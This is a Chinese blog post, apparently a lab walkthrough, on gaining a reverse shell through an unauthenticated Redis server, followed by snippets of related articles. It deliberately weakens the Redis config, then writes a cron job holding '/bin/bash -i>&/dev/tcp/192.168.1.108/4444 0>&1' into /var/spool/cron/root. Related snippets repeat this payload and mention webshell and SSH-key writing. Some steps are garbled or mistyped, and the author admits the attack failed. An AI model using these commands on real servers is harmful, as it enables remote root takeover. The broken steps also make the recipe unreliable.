redis未授权访问反弹shell

最新推荐文章于 2024-06-15 19:00:08 发布
最新推荐文章于 2024-06-15 19:00:08 发布
阅读量4.5k 收藏 2
点赞数
分类专栏: 安全漏洞 文章标签: redis未授权访问反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sdb5858874/article/details/80822536
版权
一、redis的安装
1.使用wget命令获取redis的安装包
wget http: //download.redis.io/releases/redis-4.0.8.tar.gz

2.tar –zxvf redis- 4.0 . 8 .tar.gz
解压改文件
然后进入redis-4.0.8这个文件夹   cd redis-4.0.8
然后执行make命令
由于我们刚刚安装好redis数据库,还未创建用户,默认使用的是6379端口,没有密码,这个时候会导致未授权访问
3.安装完redis之后我们要更改一下配置文件  redis.conf     默认配置是只允许127.0.0.1本机回环地址连接redis数据库。
下面操作的意思是允许公网上的其他计算机访问redis数据库
先将redis.conf配置文件复制到当前目录下的src文件夹
cp redis.conf  ./scr/redis.conf
在其中修改
bind 127.0.0.1  前面加上#注释符   
protected-mode 设为no
daemonize no
保存退出
启动redis-server
./src/redis-server redis.conf



4.我们使用kali系统作为攻击人连接redis数据库
本次测试使用kali IP:192.168.1.108
Centos IP:192.168.1.107
redis-cli -h 192.168.1.107 -p 6379
"\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.1.108/4444 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save
然后使用ns命令监听本机4444端口
ns -l 4444
讲道理应该能连上的,但是没连上,问题后续解决,步骤应该没问题。。。




白帽梦想家
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Redis授权访问反弹shell
Sylon的博客
11-21 1405
0x01:前言 这是10月份写的文章 一直放到电脑上居然忘掉了 我丢!! Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 Redis因配置不当可以授权访问(窃取数据、反弹sh...
如何通过redis授权访问漏洞反弹shell
qq_42671480的博客
05-20 1460
如何通过redis授权访问漏洞反弹shell 1.搭建redis服务器和客户端 我用centos作为靶机,用kali作为攻击方来进行实验。 下载,解压,编译: $ wget http://download.redis.io/releases/redis-4.0.10.tar.gz $ tar xzf redis-4.0.10.tar.gz $ mv redis-4.0.10 /usr/loc...
漏洞复现 - - - 授权访问漏洞Redis
weixin_67503304的博客
08-13 4698
授权访问漏洞Redis, 通过redis数据备份功能,往WEB网站根目录写入一句话木马,利用shell得到WEB网站权限,通过定时任务反弹Shell,写SSH公钥,实现免密登录linux服务器
redis 授权访问配合计划任务反弹shell
m0_65096687的博客
05-23 1326
(1)redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;(2)没有设置密码认证(一般为空),可以免密码远程登录redis服务。然后直接本地开个nc。
redis授权访问
最新发布
san3144393495的博客
06-15 1367
redis非关系型数据库。
网络安全——redis授权访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 5682
redis授权访问漏洞,顾名思义,就是不需要输入账密就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用该漏洞获取目标shell
Redis授权访问反弹shell
Zlirving_的博客
06-17 2064
Redis简介 Redis 是一个高性能的key-value数据库。为了保证效率,数据都是缓存在内存中。redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步   漏洞简介 1、什么是redis授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证,会导致任意
redis授权访问漏洞(三种方法)
网安小白的博客
08-30 5524
redis授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
redis授权访问检测脚本.py
02-11
python编写的redis授权访问漏洞检测脚本
1120362990#Paper#redis授权访问1
07-25
将生成的目录保存到 kitty.txt远程登陆redis命令获得当前备份路径的命令设置备份路径的命令config set dir /root/.ssh设置上传公
Redis-Getshell:Redis 授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
Redis 授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab
python脚本实现Redis授权批量提权
12-16
本文主要给大家介绍了关于redis授权批量提权的相关内容,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧。 安装依赖 sudo easy_install redis 使用 redis python hackredis.py usage: ...
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)POC
09-29
Celery 4.0 Redis授权访问+Pickle反序列化利用(celery3_redis_unauth)exploit Celery 版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在授权访问问题...
redis授权个人总结-Mature1
08-03
授权访问Redis可能导致敏感数据泄露或被恶意利用,因此,运维人员必须确保配置正确,限制网络访问,启用身份验证,并定期更新安全策略。例如,可以通过设置`requirepass`参数来启用密码保护,防止授权访问。...
从0到1浅析Redis服务器反弹Shell那些事
道阻且长,行则将至。
12-29 2293
本文学习了 Redis 服务的作用,并本地搭建了 Redis 服务,同时介绍了其相关基础使用方法和核心安全配置。然后总结分析了 Redis 授权访问漏洞或弱口令导致 Redis 服务被攻击者操控后,如何进一步通过反弹 Shell 接管服务器。
Redis授权访问反弹shell记录
fengqingyuel的博客
10-09 395
环境配置情况: 攻击机:kali-2021.2 ,配置IP:10.1.25.44 redis靶机:CentOS 7.2 ,配置IP:10.3.70.70 1、在攻击机(10.1.25.44)先建立监听。 nc -nvlp 7788 2、在连接redis的客户端依次执行以下命令。 set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.1.25.44/7788 0>&1\n\n" //往当前用户的cronta
SSRF——手把手教你Redis反弹Shell
sudu2020dd的博客
06-04 2954
由于业务运行的服务器处于内外网边界,并且可通过利用当前的这台服务器,根据所在的网络,访问到与外部网络隔离的内网应用,所以一般情况下,SSRF漏洞的攻击目标是攻击者无法直接访问的内网系统。因为攻击Redis A之前,首先需要构造一个样本,如何构造,通过在kali本地搭建一个Redis B,作为本地测试,形成攻击链后将他的格式转换为gopher协议,然后测试完毕后,应用在真实攻击上,将gopher协议数据包发送给存在SSRF漏洞的机器实现攻击,转给Redis A,写一个计划任务,反弹shell,往kali弹。
redis授权访问getshell
03-16
Redis授权访问是指Redis服务器的访问控制没有设置好,导致攻击者可以通过Redis的一些命令获取服务器的敏感信息或者执行恶意代码,从而实现getshell的攻击。为了避免这种情况发生,我们需要对Redis服务器进行安全...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值